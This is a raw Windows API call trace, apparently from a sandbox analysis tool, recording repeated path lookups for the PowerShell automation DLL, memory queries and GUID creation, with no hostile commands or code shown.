[0079.836] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x11e4b1fb, Data2=0xa288, Data3=0x42f6, Data4=([0]=0x9c, [1]=0x97, [2]=0x2d, [3]=0x56, [4]=0x7d, [5]=0xa8, [6]=0x74, [7]=0xc9))) returned 0x0
[0079.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.838] VirtualQuery (in: lpAddress=0x10afe0, lpBuffer=0x10bea0, dwLength=0x30 | out: lpBuffer=0x10bea0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.838] VirtualQuery (in: lpAddress=0x10b070, lpBuffer=0x10bf30, dwLength=0x30 | out: lpBuffer=0x10bf30*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.839] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.839] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.839] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.840] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.840] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.840] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.840] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.840] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.841] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.841] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.841] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.841] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.841] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.841] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.841] VirtualQuery (in: lpAddress=0x10b420, lpBuffer=0x10c2e0, dwLength=0x30 | out: lpBuffer=0x10c2e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.842] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.842] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.842] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.842] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.842] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xa1d55859, Data2=0xa362, Data3=0x4bdf, Data4=([0]=0x83, [1]=0x3, [2]=0xe3, [3]=0x12, [4]=0x33, [5]=0x8e, [6]=0x49, [7]=0xa2))) returned 0x0
[0079.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
